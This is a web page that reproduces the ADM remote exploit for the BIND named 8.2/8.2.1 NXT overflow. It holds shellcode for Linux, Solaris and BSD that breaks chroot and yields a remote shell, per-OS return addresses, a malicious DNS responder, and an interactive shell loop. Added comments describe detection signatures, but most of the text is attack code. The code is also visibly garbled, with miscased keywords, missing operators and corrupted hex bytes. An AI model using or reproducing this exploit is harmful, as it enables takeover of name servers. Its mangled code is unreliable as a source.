Bind NXT remote overflow vulnerability attack code

zhaozj2021-02-16  93

/*
 * ADM CONFIDENTIAL -- (ADM Confidential Restricted when
 * combined with the aggregated modules for this product)
 * OBJECT CODE ONLY SOURCE MATERIALS
 * (C) COPYRIGHT ADM Crew 1999
 * All Rights Reserved
 *
 * This module may not be used, published, distributed or archived without
 * the written permission of the ADM Crew. Please contact your local sales
 * representative.
 *
 * ADM named 8.2 / 8.2.1 NXT remote overflow - horizon / plaguez
 *
 * "a misanthropic anthropoid with nothing to say"
 *
 * thanks to stran9er for sdnsofw.c
 *
 * Intel exploitation is pretty straightforward.. should give you a remote
 * shell. The shellcode will break chroot, do a getpeername on all open
 * sockets, and dup to the first one that returns AF_INET. It also forks and
 * runs a command in case the fd duping doesn't go well. Solaris / SPARC is a
 * bit more complicated.. we are going through a well trodden part of the
 * code, so we don't get the context switch we need to have it populate the
 * stack. However, if you just hammer the service
 * with requests, you will quickly get a context switch at the right time.
 * Thus, the SPARC shellcode currently only breaks chroot, closes current
 * fd's and runs a command.
 * Also, the NetBSD shellcode does not break chroot because they stop the
 * dir tricks. Of course, they allow mknods in chrooted environments, so
 * if named is running as root, then it still might be exploitable.
 * The non-exec stack patch version returns into a malloc'ed buffer, whose
 * address can vary a lot. Thus, it may not be as reliable as the other
 * versions..
 *
 * We broke this just a little in order to raise the bar on using it
 * (just slightly).. if you'd like to test it on your own box, put a shell
 * in /adm/sh, or /adm/ksh for Solaris, on the target machine.
 */
# include #include #include #include #include #include #include #include #include #include #include #include #include

Char Linuxcode [] =

{0xE9, 0xAc, 0x1, 0x0, 0x0, 0x5e, 0x89, 0x76, 0x7, 0x89, 0x46, 0x10, 0x89, 0x46, 0x2e, 0x89, 0x46, 0x14, 0x56, 0xeb, 0x54, 0x5e 0x89, 0x0, 0x0, 0x0, 0xBa, 0x0, 0x0, 0x0, 0x0, 0x0, 0x5, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x50, 0x8d, 0x5e, 0x2, 0xb9, 0xff 0x1, 0x0, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x5e, 0x2, 0x, 0x0, 0x, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5b, 0x53, 0xB8, 0x85, 0x0 0x0, 0x0, 0xcd, 0x80, 0x5b, 0xB8, 0x6, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x5e, 0x, 0x0, 0xc, 0x0,0x0,0x0,0xcd, 0x80, 0x89, 0xf3, 0xb8 0x3D, 0x0, 0x0, 0x0, 0x2c, 0x80, 0xa7, 0xFF, 0xFF, 0xFF, 0x2e, 0x0, 0x41, 0x44, 0x4d, 0x52, 0x4f, 0x43, 0x4b, 0x53, 0x0, 0x2e , 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e 0x2F, 0x0, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x89, 0xc0, 0x85, 0xc0, 0x0, 0x85, 0x8E, 0x0, 0x0, 0x0, 0x89, 0xF3, 0x8d, 0x4e, 0xc 0x8d, 0x56, 0x18, 0x0, 0x0, 0xcd, 0x80, 0x0, 0x1, 0x0, 0x0, 0x0, 0x75, 0x0, 0x0, 0x0, 0x10, 0x0, 0x0 0x0, 0x0, 0x0, 0x0, 0x0, 0x74, 0x68, 0x69, 0x73, 0x6 9, 0x73, 0x73, 0x6f, 0x6d, 0x65, 0x74, 0x65, 0x70, 0x61, 0x63, 0x65, 0X66, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X73, 0X6F, 0X63, 0X6B, 0x69, 0x69, 0x61, 0x64, 0x64, 0x72, 0x69, 0x61, 0x68, 0X79, 0X65, 0X61, 0X68, 0X69, 0X6B, 0X6E, 0X6F, 0X77, 0X74, 0X68, 0X69, 0X73, 0x69, 0x73, 0x6c, 0x61, 0x6d, 0x65, 0x62, 0x75, 0x74, 0x61, 0x61, 0x79, 0x77, 0x68, 0x6F, 0X63, 0X61, 0X72, 0X65, 0X73, 0X68, 0X6F, 0x72, 0x69, 0x7a, 0x6f, 0x6e, 0x67, 0x6f, 0x74, 0x69, 0x74, 0x77, 0x6f, 0x72, 0x6b, 0x69, 0x6f, 0x67, 0x73, 0x6f, 0x61, 0x6c, 0x6c, 0x69, 0x73, 0x63, 0x6f, 0x6f, 0x6c, 0x56, 0x86, 0x46, 0x8, 0x50, 0x8b, 0x46, 0x4, 0x50, 0xff, 0x46, 0x4, 0x89, 0xe1, 0xbb, 0x7, 0x0, 0x0, 0x0, 0xB8, 0X66, 0x0, 0x0, 0x0, 0XCD, 0x80, 0X83, 0XC4, 0X80, 0X89, 0XC0, 0X85, 0X, 0X2, 0X75, 0X7E, 0X8, 0X2, 0X75, 0X3, 0X8B,

0x56, 0x4, 0x4a, 0x52, 0x89, 0x3, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5a, 0x52, 0x89, 0x0, 0xB9, 0X1, 0x0, 0x0, 0x0, 0xB8, 0X3F, 0x0, 0x0, 0x0, 0x0, 0x89, 0x3, 0xB9, 0X2, 0x0, 0x0, 0x0, 0X0, 0X3F, 0x0, 0x0, 0x0, 0XCD, 0X80, 0x46, 0x46, 0X46, 0X46, 0X46, 0X46, 0X46, 0X10, 0x0, 0x0, 0x0, 0x0, 0xE9, 0XFE, 0XFE, 0xFF, 0xFF, 0xE8, 0XE9, 0xFF, 0xFF, 0xFF, 0xE8, 0X4F, 0xFE, 0xFF, 0x0x, 0x2F, 0x61, 0x64, 0X68, 0x2F, 0x73, 0x68, 0x0, 0x2D, ​​0x63, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x31, 0x30, 0x2f, 0x39, 0x39, 0x2D};

Char sc [] = {0x40, 0x0, 0x0, 0x2e, 0x1, 0x0, 0x0, 0x0, 0x90, 0x3, 0x10, 0x20, 0x0, 0x82, 0x10, 0x20, 0x5, 0x91, 0x0, 0x20, 0x0, 0xA0, 0x10, 0x0, 0x8, 0X90, 0X3, 0X10, 0X21, 0x92, 0X10, 0X21, 0X20, 0X80, 0X91, 0X20, 0X20, 0X0, 0X90, 0X3, 0XE0, 0xcc, 0x82, 0x10, 0x20, 0x3d, 0x91, 0x0,0x20,0 x0, 0x90,0 x 10 x 10 x0, 0x78, 0x91, 0x2, 0x20, 0x0, 0x90, 0x10, 0x0, 0x10, 0x82, 0x10, 0x20, 0x6, 0x91, 0x2, 0x20, 0x0, 0x90, 0x3, 0x10, 0x20, 0xc, 0x91, 0x2, 0x20, 0x0, 0x90, 0x3, 0x0, 0x2, 0x82, 0x10, 0x20, 0x0, 0x0, 0xA0, 0x10, 0x20, 0x0, 0x90, 0x10, 0x0, 0x10, 0x82, 0x10, 0x20, 0x6, 0x91, 0x0, 0x20, 0x0, 0xa0, 0x4, 0x20, 0x1, 0x80, 0xA4, 0x20, 0x1e, 0x4, 0x/0, 0x0, 0x0, 0x90, 0x3, 0xE0, 0XC0, 0XA0, 0X3, 0XE0, 0XC5, 0XE0, 0X23, 0XBF, 0xF0, 0xA0, 0x3, 0xE0, 0XC9, 0XE0, 0X23, 0X3, 0X23, 0X5, 0X3, 0X23, 0X5, 0XF8, 0XC0, 0X23, 0XBF, 0xFC, 0x92, 0X3, 0XBF, 0xF0, 0x94, 0x3, 0x10, 0x20, 0x3b, 0x91,0x2,0x20,0 x0, 0x81,0xc3,0x0,0x8, 0x1,0x0,0 x0, 0 x0, 0x2f, 0x61, 0x64, 0x6d, 0x2f, 0x6b, 0x73, 0x68, 0x0, 0x2d, 0x63, 0 X0, 0X41, 0X44, 0X4D, 0x52, 0X4F, 0x43, 0X4B, 0x53, 0x0, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x68, 0x6f, 0x72, 0x69, 0x7a, 0x6f, 0x6e, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x31, 0x30, 0x2f, 0x39, 0x39, 0x0}; char bsdcode [] =

{0xE9, 0X0, 0X5E, 0X31, 0XC0, 0X50, 0X50, 0X50, 0X17, 0X50, 0X50, 0X56, 0X50, 0X50, 0X5, 0X50, 0X80, 0X89 0x46, 0x28, 0x0, 0x0, 0x51, 0x8d, 0x46, 0x2, 0x50, 0x50, 0xB8, 0x88, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x8d, 0x46, 0x2, 0x50, 0x50 0xB8, 0X3D, 0x0, 0x0, 0X8B, 0X46, 0X28, 0X50, 0X50, 0X2, 0XA7, 0x0, 0x0, 0x0, 0X34, 0XAA, 0XCD, 0X80, 0X8D, 0X46, 0X, 0X50 0x50, 0x0, 0xA6, 0x0, 0xAa, 0xcd, 0x80, 0x8d, 0x46, 0x21, 0x48, 0x50, 0x50, 0x, 0x3d, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x50, 0xb8 0x2, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x85, 0xc0, 0x0, 0x85, 0xE6, 0x0, 0x0, 0x38, 0x89, 0x56, 0x28, 0x8d, 0x46, 0x40, 0x89, 0x46 , 0x2c, 0x8d, 0x46, 0x43, 0x89, 0x46, 0x30, 0x8d, 0x46, 0x30, 0x50, 0x, 0x46, 0x28, 0x50, 0x52, 0x50, 0x0, 0x0, 0xcd, 0x80, 0x50 0x50, 0x0, 0x0, 0xcd, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x62, 0x6c, 0x61, 0x68 0x62, 0x6c, 0x61, 0x68, 0x73, 0x61, 0x6d, 0x69, 0x74, 0x68, 0x69, 0x6e, 0x67, 0x79, 0x65, 0x74, 0x61, 0x68, 0x6F, 0X74, 0X68, 0X65, 0X72, 0X73, 0X70 0x61, 0x63, 0x65, 0x66, 0x6f, 0x72, 0x61, 0x73, 0x6F, 0x63, 0X64, 0X72, 0X73, 0X74, 0X72, 0X75, 0X63, 0X74, 0X75, 0X72, 0X65, 0X62, 0X75, 0X74, 0X74, 0X68, 0X69, 0x73, 0x74, 0x69, 0X6D, 0x65, 0x66, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X73, 0X68, 0X65, 0X6C, 0X6C, 0X63, 0X6F, 0X64, 0X65, 0X66, 0X6F, 0x72, 0x74, 0x75, 0x6e, 0x61, 0x74, 0x6c, 0x79, 0x74, 0x68, 0x69, 0x73, 0x77, 0x69, 0x6c, 0x6c, 0x6b, 0x69, 0x68, 0x6f, 0x70, 0x65, 0x6f, 0x6b, 0x69, 0x74, 0x68, 0x69, 0x6e, 0x6b, 0x65, 0x67, 0x68, 0x73, 0x70, 0x61, 0x63, 0x65, 0x6e, 0x6f, 0x77, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x20, 0x42, 0x53, 0x44, 0x20, 0X63, 0X72, 0X61, 0X70, 0X70, 0X79, 0X20, 0X73, 0X68, 0X65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x20, 0x2d, 0x20, 0x31, 0x30, 0x2f, 0x39, 0 x 39, 0x31, 0xD2, 0xE9, 0x3F, 0xFF, 0xFF, 0xFF,

0x8d, 0x46, 0x4, 0x50, 0x8d, 0x46,0x8,0x50,0x1f, 0x0,0x0,0 x0 xcd, 0x80, 0x5a, 0x83, 0xf8, 0x0,0x75,0x6,0x80,0x7e, 0x9, 0x2, 0x74, 0xc, 0x52, 0x52, 0x/0, 0x6, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x42, 0x, 0x0 x 5 x 6a, 0x0, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0, 0xCD, 0x80, 0x6a, 0x1, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0,0x2,0x52,0 x 52, 0 x2, 0x5a, 0x0,0 x0, 0 x0, 0xcd, 0x80, 0xeb, 0x29, 0x5e, 0x46, 0x46, 0x46, 0X46, 0X46, 0X8D, 0X56, 0X38, 0X89, 0X56, 0X28, 0X0, 0X46, 0X2C, 0x0, 0x0, 0x0, 0x0, 0x8d, 0x46, 0x34, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52, 0x52, 0xB8, 0X3B, 0x0, 0x0, 0x0, 0xcd, 0x80, 0xe9, 0xc1, 0xFe, 0xFF, 0xFF, 0XE8, 0X2, 0xFF, 0xFF, 0xFF, 0xE8, 0X27, 0XFE, 0xff, 0xff, 0x2e, 0x0,0x41,0x44,0x4d, 0x52, 0x4f, 0x43, 0x4b, 0x53, 0x0,0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x0, 0x2e, 0x2f, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x2f, 0x61, 0x64, 0x6d, 0x2f, 0x73, 0x68, 0x0, 0x2d, 0x63, 0x75, 0x63, 0x68, 0x20, 0x2f, 0x74, 0x6d, 0x7 0, 0x2f, 0x59, 0x4f, 0x59, 0x4f, 0x59, 0x4f, 0x0}; char bsdnochroot [] =

{0xE9, 0X79, 0X1, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x85, 0xc0, 0x10, 0x85, 0xe6, 0x0, 0x0, 0x0, 0x8d, 0x56, 0x38 0x89, 0x56, 0x28, 0x8d, 0x46, 0x40, 0x89, 0x46, 0x43, 0x89, 0x46, 0x30, 0x8d, 0x46, 0x30, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52,0x50 0xB8, 0x3B, 0x0, 0x0, 0X50, 0X50, 0X80, 0x1, 0x0, 0x0, 0x0, 0xCD, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 0xFF, 0x0, 0x6c, 0x61, 0x68, 0x62, 0x6c, 0x61, 0x68, 0x73, 0x61, 0x68, 0x65, 0X74, 0X68, 0X69, 0X6E, 0X67, 0X79, 0X65, 0X74, 0X61 0x6e, 0x6f, 0x74, 0x68, 0x70, 0x61, 0x63, 0x65, 0x66, 0x6f, 0x72, 0x61, 0x73, 0x6f, 0x63, 0x6b, 0x61, 0x64, 0x64, 0x72, 0x73, 0x74 , 0x72, 0x75, 0x72, 0x65, 0x62, 0x75, 0X74, 0X74, 0X68, 0X69, 0X73, 0X74, 0X69, 0X6F, 0X72, 0X74, 0X68, 0X65, 0X62 0x73, 0x64, 0x73, 0x68, 0x65, 0X6F, 0X64, 0X65, 0X66, 0X6F, 0X72, 0X74, 0X75, 0X6E, 0X61, 0X74, 0X6C, 0X79, 0X74, 0X68, 0X69, 0X73 0x77, 0x69, 0x6c, 0x6c, 0x77, 0x6f, 0x72, 0x6b, 0x69, 0x68, 0x6f, 0x70, 0x65, 0x6f, 0x6b, 0x69, 0x6e, 0x6b, 0x65, 0x6e, 0x6f, 0x75 0x 67, 0x68, 0x73, 0x70, 0x61, 0x63, 0x65, 0x6e, 0x6f, 0x77, 0x0, 0x70, 0x6c, 0x61, 0x67, 0x75, 0x65, 0x7a, 0x5b, 0x41, 0x44, 0x4d, 0x5d, 0x20, 0x42, 0x53, 0X44, 0X20, 0X63, 0X70, 0X79, 0X20, 0X73, 0X68, 0X65, 0X6C, 0x6C, 0X63, 0X6F, 0X64, 0X65, 0X20, 0X2D, 0X20, 0X31, 0X30, 0X2F, 0x39, 0x39, 0x31, 0xD2, 0xE9, 0x3F, 0xFF, 0xFF, 0xFF, 0x5E, 0x8D, 0x46, 0X4, 0X50, 0X8D, 0X46, 0X8, 0X50, 0X52, 0X52, 0XB8, 0X1F, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x5a, 0x83, 0x0,0x0,0x7e, 0x9,0x2,0 x74, 0xc, 0x52,0 x 52, 0 x0, 0x6, 0x0, 0x0, 0 x0, 0xcd, 0x80, 0x42, 0xeb, 0xD7, 0x6a, 0x0, 0x52, 0x52, 0x0, 0x5a, 0x0, 0x0, 0x0, 0x1, 0x52, 0x52, 0x1, 0x5a, 0x0, 0x0, 0x0, 0xcd, 0x80, 0x6a, 0x2, 0x52, 0x52, 0x0, 0x5A, 0x0, 0x0, 0x0, 0x29, 0x5E, 0X46, 0X46, 0X46, 0X46, 0X46, 0X8D, 0X56, 0X38, 0X89, 0X56, 0X28, 0XC7, 0X46, 0x2c, 0x0,

0x0, 0x0, 0x0, 0x8d, 0x46, 0x34, 0x50, 0x8d, 0x46, 0x28, 0x50, 0x52, 0x52, 0x0, 0x0, 0xcd, 0x80, 0xe9, 0xc0, 0xFe, 0xFF, 0xFF, 0xE8, 0xD2, 0xFF, 0xFF, 0xFF, 0xE8, 0X82, 0XFE, 0xFF, 0xFF, 0X2E, 0X0, 0X41, 0X44, 0X4D, 0X52, 0X4F, 0X43, 0X4B, 0X53, 0x0, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x0, 0x2e, 0x2f, 0x0, 0x0, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0x0, 0x0, 0x2F, 0x61, 0x64, 0X68, 0x2F, 0X73, 0X68, 0x0, 0x2D, 0x63, 0x0, 0x74, 0x6F, 0X75, 0X2F, 0X74, 0X6D, 0x70, 0x2F, 0X59, 0X4F, 0X59, 0X4F, 0X59, 0X4F, 0x0}; struct arch {Int id; char * name CHAR * CODE; INT CODESIZE; UNSIGNED Long Ret; INT Length;

/*
 * Target table. Each initializer carries seven values: a numeric id, a
 * human-readable target name, the payload array and its size, a selector
 * that make_overflow() reads as `.safe`, a value it reads as `.ret`, and the
 * `.length` that form_response() uses to size the NXT record data.
 * NOTE(review): the struct arch text on this page shows no `safe` member,
 * so this field order is inferred from the initializers -- confirm against
 * an intact copy. The all-zero entry terminates the list.
 *
 * Defender notes, all taken from values visible in this listing:
 *  - The names enumerate the exposed deployments: named 8.2 / 8.2.1 on
 *    Red Hat Linux 6.x, Solaris 2.6 and 7, FreeBSD 3.2, OpenBSD 2.5 and
 *    NetBSD 1.4.1. Inventory name servers against this list and upgrade
 *    named off the listed releases.
 *  - `.length` is 6500, 7000 or 11000, so the NXT record in the crafted
 *    message is thousands of bytes long; record data of that size in an
 *    NXT record is a usable network detection signal.
 *  - The payload arrays above contain printable byte runs that decode to
 *    "ADMROCKS", "/adm/sh", "/adm/ksh" and "/tmp/YOYOYO". These work as
 *    content signatures on DNS traffic and as names to look for during
 *    filesystem triage of a suspected name server.
 */
Struct Arch Archlist [] = {{1, "Linux Redhat 6.x - Named 8.2 / 8.2.1 (from rpm)", Linuxcode, SizeOf (Linuxcode), 0, 0xBFFD6C3, 6500}, {2, "Linux Solardiz's Non -EXEC Stack Patch - Named 8.2 / 8.2.1 ", Linuxcode, SizeOf (Linuxcode), 0, 0x80f79ae, 6500}, {3," Solaris 7 (0xFF) - Named 8.2.1 ", SC, SIZEOF (SC), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - Named 8.2.1", SC, SIZEOF (SC), 0xEFFFA000, 0xEffe5D0, 11000}, {5, "FreeBSD 3.2-Release - Named 8.2", BSDCode, Sizeof (BSDCODE), 1, 0XBFBFBDB8, 7000}, {6, "OpenBSD 2.5 - Named 8.2", BSDCode, Sizeof (BSDCode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - Named 8.2.1" Bsdnochroot, Sizeof (BSDnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0}};

/*
 * Program-wide selections, both set from the command line in main():
 * the index into the target table (argv[1] minus one) and an optional
 * command string (argv[2]) that make_overflow() appends after the payload;
 * when no command is given, make_overflow() appends "exit" instead.
 */
INT Arch = 0; char * command = 0;

/* These two DNS routines are from dspoof / jizz */

/*
 * Decodes the DNS name that starts at p inside the message buf and writes
 * it to s as dot-separated text. A length byte of 0xc0 or more is treated
 * as a compression pointer: the first such position is remembered in b and
 * decoding continues at the offset taken from the low 14 bits. Returns the
 * position after the first pointer when one was followed, otherwise the
 * position after the name.
 * NOTE(review): this listing is damaged -- operators such as `++` and `+`
 * have been dropped, the inner copy loop is cut off after `i`, and the
 * function's closing brace is missing. Nothing visible bounds the writes
 * to s or the number of pointers followed.
 */
/ * Pull Out a commitsed query name * / char * DNSSPrintFlabel (Char * S, Char * BUF, CHAR * P) {UNSIGNED SHORT I, LEN; Char * B = NULL; LEN = (unsigned short) * (p ); While (LEN) {While (LEN> = 0xc0) {if (! b) b = p 1; p = buf (NTOHS (* ((unsigned short *))) & ~ 0xc000); LEN = (unsigned short) * (p );

For (i = 0; i

* (S ) = '.';

Len = (unsigned short) * (p );}

* (S ) = 0; if (b) return (b);

Return (P);

/*
 * Encodes the dotted name in label into DNS wire form at p: for each
 * component it stores a length byte followed by the component's bytes,
 * then a zero byte to end the name. A single trailing '.' stops the loop.
 * Returns the write position after the encoded name.
 * NOTE(review): the increment and `+=` operators are missing from this
 * listing and the closing brace of the function is lost; the description
 * follows the visible strchr / memcpy sequence. The destination size is
 * not checked anywhere in the visible code.
 */
/ * Store a Query Name * / char * DNSADDLABEL (Char * P, Char * Label) {char * p1;

While (* label) && (label)) {IF ((* Label == '.') && (! * (label 1))) Break;

P1 = strchr (label, '.');

IF (! p1) p1 = strchr (label, 0);

* (p ) = p1-label; Memcpy (p, label, p1-label); p = p1-label;

Label = p1; if (* p1) label ;} * (p ) = 0;

Return (P);

/*
 * Fills the buffer a with the data that form_response() places inside the
 * NXT record. The layout depends on the selected target's `.safe` value:
 *   0 (commented "Linux") and 1 (commented "BSD"): the buffer is filled
 *     with 0x90 bytes, the target's payload array and the command string
 *     (or "exit") are copied in, and the `.ret` value is stored 20 times;
 *   anything else (commented "sparc"): the buffer is zeroed, a fixed
 *     32-bit value is stored 1500 times, and a sequence of words mixing
 *     0xdeadbeef, `.safe` and `.ret` is written.
 * NOTE(review): this listing is damaged. Arithmetic operators are missing
 * throughout, and the sparc branch has lost text between the loop header
 * and a string that still mentions /tmp/bob, inetd -s and rm -f.
 *
 * Defender notes drawn from the visible constants: long runs of 0x90
 * bytes and a repeated 4-byte value inside DNS record data are content
 * signatures for this message; on a suspected Solaris host, a transient
 * /tmp/bob file and an inetd process started with -s pointing at it are
 * host-side indicators.
 */
Void make_overflow (char * a) {INT i; unsigned long * b; unsigned char * c; char sbuf [4096];

IF (Archlist [Arch] .safe == 0) / * Linux * / {MEMSET (A, 0x90, 4134); Memcpy (A 3500, Archlist [Arch] .code, Archlist [Arch] .codesize;

IF (Command) STRCPY (A 3500 Archlist [Arch] .codesize, command); Else Strcpy (A 3500 Archlist [Arch] .codesize, "exit");

B = (unsigned long *) (A 4134); for (i = 0; i <20; i ) * b = Archlist [Arch] .ret;} else if (Archlist [Arch] .safe == 1) / * BSD * / {MEMSET (A, 0x90, 4134); Memcpy (A 3300, Archlist [Arch] .code, Archlist [Arch] .codesize);

IF (Command) STRCPY (A 3300 Archlist [Arch] .codesize, command); Else Strcpy (A 3300 Archlist [Arch] .codesize, "exit"); b = (unsigned long *) (A 4134 ); For (i = 0; i <20; i ) * b = Archlist [Arch] .ret;} else / * sparc * / {MEMSET (A, 0x0, 11000);

B = (unsigned long *) (A 4438);

For (i = 0; i <1500; i ) * b = HTONL (0xac15a16e);

C = (char *) b; for (i = 0; I > / TMP / BOB; / USR / SBIN / INETD -S / TMP / BOB; / BIN / RM -F / TMP / BOB ");

B = (unsigned long *) (A 4166);

* B = HTONL (0xDeadbeef); * b = HTONL (0xdeADBeef); * b = HTONL (Archlist [Arch] .safe); // I2 - Significant * B = HTONL (0xdeADBeef); * B = HTONL (0xdeAdbeef); * B = HTONL (Archlist [Arch] .safe); // i5 - signitive * b = htonl (0xdeadbeef); * b = HTONL (0xdeADBeef);

* B = HTONL (Archlist [Arch] .safe); // O0 - Signitiveant * B = HTONL (0xdeADBeef); * B = HTONL (Archlist [Arch] .safe); // O2 - Significant * B = HTONL (0xdeADBeef ); * B = htonl (0xdeadbeef); * b = htonl (0xdeadbeef); * b = HTONL (Archlist [Arch] .safe); // O6 - Significant * B = HTONL (Archlist [Arch] .ret); / / o7 - retarddr}}

/*
 * Builds a DNS message in buf that answers the query held in packet and
 * returns its length (walker minus buf). The message copies the query's
 * ID, sets the QR and AA bits, and declares one question, one answer and
 * one additional record. Its body is, in order: the question echoed back,
 * an A record with TTL 60 * 5 and address bytes 1, 2, 3, 4, and an NXT
 * record (T_NXT) with the same TTL whose data is a 6-byte label written
 * by the sprintf call followed by the output of make_overflow().
 * NOTE(review): the record data length is written as `.length 7` in this
 * listing; presumably a `+` was lost -- confirm against an intact copy.
 *
 * Defender notes drawn from the visible fields: the message is a response
 * (QR set) that the receiving server did not request on that connection,
 * it carries an NXT record whose data length is `.length` (6500 to 11000
 * in the target table) plus a small constant, and its answer section holds
 * the fixed address 1.2.3.4. Each of these can be matched by an IDS rule
 * or a DNS-aware proxy placed in front of the name server.
 */
INT form_response (header * packet, char * buf) {char query [512]; int qtype; header * DNSH; char * p; char * walker;

MEMSET (BUF, 0, SIZEOF (BUF)); DNSH = (Header *) BUF; DNSH-> ID = Packet-> ID; DNSH-> QR = 1; DNSH-> AA = 1; DNSH-> qdcount = Htons (1); DNSH-> Ancount = htons (1); DNSH-> arcount = htons (1); DNSH-> rcode = 0;

Walker = (char *) (DNSH 1);

P = DNSSPRINTFLABEL (Query, (char *) packet, (packet 1)); Query [Strlen (Query) - 1] = 0;

Qtype = * ((unsigned short *) p);

Printf ("% s type =% d / n", query, ntohs (qtype));

/ * first, the query * /

Walker = DNSADDLABEL (Walker, Query); Putshort (NTOHS (QTYPE), Walker; // Putshort (htons (t_ptr), Walker; Putshort (1, Walker);

/ * THEN, OUR Answer * / / * query in a 1.2.3.4 * /

Walker = DNSADLABEL (Walker, Query); Putshort (T_A, Walker); Putshort (1, Walker); PUTLONG (60 * 5, Walker); Putshort (4, Walker); Sprintf (Walker, "% C% C% C) % C ", 1, 2, 3, 4); Walker = 4;

/ * Finally, we make named do something more interesting * /

Walker = DNSADDLABEL (Walker, Query); Putshort (T_NXT, Walker); Putshort (1, Walker); PUTLONG (60 * 5, Walker);

/ * The Length of One Label And Our Arbitrary Data * /

Putshort (Archlist [Arch] .length 7, Walker);

Putshort (6, Walker); Sprintf (Walker, "AdmAdm"); Walker = 6; Putshort (0, Walker);

Make_overflow (Walker); Walker = Archlist [Arch] .length; Putshort (0, Walker); Return Walker-buf;}

/*
 * Helper used by proxyloop() to compute the first argument to select().
 * NOTE(review): as printed here the expansion has no `?` and compares x
 * with itself, so it is not a valid conditional expression; the text was
 * evidently damaged along with the rest of the listing.
 */
#define max (x, y) ((x)> (x): (y))

/*
 * proxyloop(s): after a one-second pause, writes a fixed command line to
 * the socket s, then relays data in both directions with select(): lines
 * read from stdin are written to s, and data read from s is printed to
 * stdout. It exits the process when the peer closes the socket and
 * returns -3 when read() fails.
 *
 * Defender note: the first bytes sent on the connection are the command
 * string visible in the strcpy below (a directory change followed by
 * uname, pwd and id). Those programs appearing as children of the named
 * process is a host-side detection point.
 */
INT proxyloop (int S) {char SND [1024], RCV [1024]; FD_SET RSET; INT MAXFD, N;

Sleep (1); Printf ("Entering proxyloop ../ n"); strcpy (SND, "CD /; Uname -A; PWD; ID; / N"); WRITE (S, SND, STRLEN (SND));

FOR (;;) {fd_set (FDINO (STDIN), & RSET); FD_SET (S, & RSET); MAXFD = Max (Fileno (stdin), s) 1; SELECT (Maxfd, & RSET, NULL, NULL, NULL); IF (FD_ISSET (Fileno (stdin), & rset) {Bzero (SND, SIZEOF (SND)); FGETS (SND, SIZEOF (SND) - 2, STDIN); Write (S, SND, STRLEN (SND));} IF (fd_isset (s, & rset)) {Bzero (RCV, SIZEOF (RCV)); IF ((n = read (s, rcv, sizeof (rcv))) == 0) exit (0); if (n < 0) {RETURN-3;} fputs (rcv, stdout);}} Return 0;} int main (int Argc, char ** argv) {Int S, Fromlen, RES, SL, S2; Struct Sockaddr_in SA, FROM, TO; char buf [16384]; unsigned short ts; int i;

/*
 * main() begins at the end of the line above. It reads the target number
 * and optional command from argv, binds a UDP socket to port 53 on all
 * addresses, and waits for a DNS query. For each query it builds a message
 * with form_response(), opens a TCP connection to port 53 on the address
 * the query came from, and writes a 2-byte length followed by the message.
 * When the target's `.safe` value is greater than 1 the connection is
 * closed and the loop repeats; otherwise the socket is handed to
 * proxyloop().
 * NOTE(review): the listing is damaged here too (for example the socket()
 * call has lost its first argument and the usage block has no closing
 * brace), and main's own closing brace is missing.
 *
 * Defender notes drawn from the visible flow: the sequence only starts
 * once the name server sends a query to the host running this program, so
 * the exposed population is name servers that resolve names on behalf of
 * others. On the wire it appears as an outbound UDP query from the name
